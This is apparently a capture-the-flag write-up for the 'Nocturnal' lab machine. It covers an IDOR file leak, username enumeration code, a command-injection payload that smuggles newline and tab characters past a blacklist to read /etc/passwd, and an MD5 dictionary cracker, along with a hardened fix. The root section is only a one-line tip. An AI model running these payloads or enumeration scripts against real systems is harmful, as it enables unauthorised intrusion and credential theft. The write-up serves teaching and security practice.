
Nocturnal

Machine: Easy

Initial Reconnaissance

Started with a basic nmap scan to enumerate open ports and services:

[Screenshot: Nmap scan results showing open ports 22 (SSH) and 80 (HTTP)]

The scan revealed two key services:

  • SSH on port 22 (OpenSSH 8.2p1)
  • HTTP on port 80 (nginx 1.18.0)

Web Application Access

Initially the site did not load: the hostname nocturnal.htb does not resolve on its own, so it has to be mapped to the machine's IP in /etc/hosts by adding:

10.10.10.X nocturnal.htb

⚠️ Important: without this hosts entry the site will not load, and neither will the requests in the rest of this write-up.

Username Enumeration

I wrote a Python script (test.py) that probes the web application for existing usernames. To run it:

python3 test.py <cookies_here>

Note: Replace <cookies_here> with your session cookie, copied from the browser's developer tools (Storage tab), so that the requests are made as a logged-in user.

The scan revealed three usernames:

  • admin
  • amanda
  • tobias
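The write-up does not include test.py, so here is an added example of the approach (my code, not the author's script). It assumes that view.php answers differently for a user that exists than for one that does not; rather than hard-coding that wording, it compares every candidate's response against a baseline response for a random username that cannot exist. The `file=x` value and the host are assumptions taken from the write-up's URL; `fake_probe` is a constructed stand-in for the target so the module runs offline, and `http_probe` is the live version.

```python
"""Differential username enumeration against a web endpoint.

Added example, not the author's test.py. Assumption: /view.php?user=<name>&file=<x>
responds differently for an existing user than for an unknown one. The exact
wording of that difference does not matter, because each candidate is compared
against a baseline taken from a username that certainly does not exist.
"""
import secrets
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Iterable, List, Tuple

Probe = Callable[[str], Tuple[int, str]]      # name -> (HTTP status, body)

TARGET = "http://nocturnal.htb/view.php"      # host from the write-up


def http_probe(session_cookie: str, target: str = TARGET) -> Probe:
    """Live probe: GET view.php?user=<name>&file=x with the session cookie.

    'file=x' is an arbitrary value (assumption): the parameter is required by
    the page, but its content does not matter for telling users apart.
    """
    def probe(name: str) -> Tuple[int, str]:
        qs = urllib.parse.urlencode({"user": name, "file": "x"})
        req = urllib.request.Request(f"{target}?{qs}",
                                     headers={"Cookie": session_cookie})
        try:
            with urllib.request.urlopen(req, timeout=10) as resp:
                return resp.status, resp.read().decode(errors="replace")
        except urllib.error.HTTPError as e:
            return e.code, e.read().decode(errors="replace")
    return probe


def signature(status: int, body: str, noise: Iterable[str]) -> Tuple[int, str]:
    """Reduce a response to the parts that should be stable across requests.

    Strings in `noise` (the echoed username, a CSRF token, ...) are blanked
    out so they do not make every response look unique; whitespace is
    normalised for the same reason.
    """
    for n in noise:
        body = body.replace(n, "")
    return status, " ".join(body.split())


def enumerate_users(probe: Probe, candidates: Iterable[str]) -> List[str]:
    """Return the candidates whose response differs from a guaranteed-unknown name."""
    bogus = "zz" + secrets.token_hex(6)             # cannot be a real account
    base = signature(*probe(bogus), noise=[bogus])
    found: List[str] = []
    for name in candidates:
        if signature(*probe(name), noise=[name]) != base:
            found.append(name)
    return found


# --- constructed stand-in for the target, so the module runs offline ---
_FAKE_USERS = {"admin", "amanda", "tobias"}         # the three the write-up found


def fake_probe(name: str) -> Tuple[int, str]:
    """Constructed responses; the real page's wording is not known here."""
    if name in _FAKE_USERS:
        return 200, f"<h2>Files for {name}</h2><ul></ul>"
    return 200, f"<p>User {name} not found.</p>"


if __name__ == "__main__":
    wordlist = ["admin", "alice", "amanda", "bob", "tobias", "root"]
    print(enumerate_users(fake_probe, wordlist))    # ['admin', 'amanda', 'tobias']
    # Against the live target:  enumerate_users(http_probe("PHPSESSID=..."), wordlist)
```

Comparing against a baseline rather than matching a fixed error string is what keeps the script usable when the application's messages change; the one thing to watch is rate limiting or lockout on the endpoint, which would alter the responses for every name and show up as false positives.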

Initial Access

The /view.php endpoint takes user and file parameters, for example:

http://nocturnal.htb/view.php?user=amanda&file=e.pdf

It never checks that the logged-in user owns the requested file, so any account can read other users' uploads. Browsing amanda's files this way turned up privacy.odt, which contained temporary login credentials.

With those credentials I logged in as amanda, which also gave access to the admin panel.

Admin Panel Exploitation

The admin panel has a backup feature protected by a password. Supplying amanda's password returned a zip file containing the web application's source code. Reviewing it showed several candidate injection points; the one used here is the backup password field, whose value evidently reaches a shell with only a character blacklist in the way, since a newline (%0A) gets through as a command separator and tabs (%09) get through in place of spaces. The payload writes its output into the web-accessible uploads directory so it can be fetched over HTTP:

password=test%0Acat%09/etc/passwd%09>%09../uploads/passwd.txt
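Why this payload works, as an added example (my code, modelling the pattern the payload implies; it is not the application's PHP): a blacklist that strips the obvious shell metacharacters but not newline or tab, in front of a command string handed to a shell. The blacklist contents and the command line are assumptions, and `echo` stands in for the real program so the block is harmless to run; the hardened version passes the password as one argv element and never involves a shell.

```python
"""Command injection through a blacklisted password field, and the fix.

Added example, not the Nocturnal application's code. The BLACKLIST and the
command line are assumptions for illustration; 'echo' stands in for the
real backup program so that running this does nothing harmful.
"""
import subprocess
import urllib.parse

# Assumed blacklist: what a naive filter typically rejects. What is missing is
# newline (\n), which a shell treats as a command separator, and tab (\t),
# which it treats as ordinary whitespace between arguments.
BLACKLIST = set(" ;&|$`\\'\"(){}")


def passes_filter(password: str) -> bool:
    """The filter the payload has to get past."""
    return not any(c in BLACKLIST for c in password)


def vulnerable_backup(password: str) -> str:
    """Command string + shell=True: the shell re-parses whatever is in the password."""
    if not passes_filter(password):
        return "rejected"
    cmd = f"echo backup-password-{password}"      # stands in for: zip -P <password> ...
    out = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return out.stdout


def hardened_backup(password: str) -> str:
    """Argument list, no shell: the password is a single argv entry, whatever it contains."""
    out = subprocess.run(["echo", f"backup-password-{password}"],
                         capture_output=True, text=True)
    return out.stdout


# The write-up's payload, URL-decoded (%0A -> newline, %09 -> tab).
ORIGINAL = urllib.parse.unquote("test%0Acat%09/etc/passwd%09>%09../uploads/passwd.txt")
# Same structure with the injected command swapped for a harmless marker.
PAYLOAD = "test\necho\tINJECTED"

if __name__ == "__main__":
    print(passes_filter(ORIGINAL))              # True: the filter never sees \n or \t
    print(repr(vulnerable_backup(PAYLOAD)))     # 'backup-password-test\nINJECTED\n'
    print(repr(hardened_backup(PAYLOAD)))       # 'backup-password-test\necho\tINJECTED\n'
```

The fix is not a longer blacklist: any string that reaches a shell is re-parsed by it, so the password has to stay out of the shell entirely (an argument list, as in `hardened_backup`), and on top of that it should be validated against an allowlist of the characters a backup password is expected to contain before it is used at all.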

Reading /etc/passwd confirms command execution and lists the system's accounts, but that file holds no password hashes. The user IDs and MD5 password hashes came from the application's own user store, read with the same injection. Unsalted MD5 is not decrypted but looked up: Crackstation matched the hash and gave tobias's password.
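What Crackstation does, as an added example (my code, not anything from the write-up): a dictionary attack on unsalted MD5, where one pass over the wordlist serves every hash at once because identical passwords hash identically for every user. The user records and the wordlist are constructed for the demonstration; the hashes are computed here from made-up passwords, not values from the machine.

```python
"""Offline recovery of unsalted MD5 password hashes by dictionary lookup.

Added example, not from the write-up. RECORDS and WORDLIST are constructed;
the hashes are the MD5 of made-up passwords, not anything from the target.
"""
import hashlib
import re
from typing import Dict, Iterable, List, Tuple

MD5_RE = re.compile(r"^[0-9a-f]{32}$")


def looks_like_md5(h: str) -> bool:
    """32 hex characters: consistent with MD5 (a sanity check before trying)."""
    return bool(MD5_RE.match(h.strip().lower()))


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def crack_md5(records: Iterable[Tuple[str, str]], wordlist: Iterable[str]) -> Dict[str, str]:
    """Map each username to the wordlist entry whose MD5 equals its hash.

    Hashes are indexed first so the wordlist is hashed once, not once per user;
    without a salt, users who share a password share a hash, so several users
    can be resolved by one digest.
    """
    targets: Dict[str, List[str]] = {}
    for user, h in records:
        if looks_like_md5(h):
            targets.setdefault(h.strip().lower(), []).append(user)
    found: Dict[str, str] = {}
    for word in wordlist:
        for user in targets.get(md5_hex(word), []):
            found[user] = word
    return found


def uncracked(records: Iterable[Tuple[str, str]], found: Dict[str, str]) -> List[str]:
    return [user for user, _ in records if user not in found]


# Constructed sample data: (username, md5 hash). Passwords are made up.
RECORDS = [
    ("admin", md5_hex("p@ssw0rd!")),
    ("amanda", md5_hex("letmein")),
    ("tobias", md5_hex("summer2024")),
]
WORDLIST = ["123456", "password", "letmein", "summer2024", "qwerty"]

if __name__ == "__main__":
    hits = crack_md5(RECORDS, WORDLIST)
    print(hits)                              # {'amanda': 'letmein', 'tobias': 'summer2024'}
    print(uncracked(RECORDS, hits))          # ['admin']
```

An online table such as Crackstation is the same idea with a precomputed index of digests; a hash that is absent from it (admin above) means only that the password was not in the wordlist, not that it is strong.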

User Access

With tobias's credentials, I established an SSH connection:

ssh tobias@<ip>

This gave me access to the user flag (user.txt).

Root Access

💡 Tip: The path to root involves the ISPConfig panel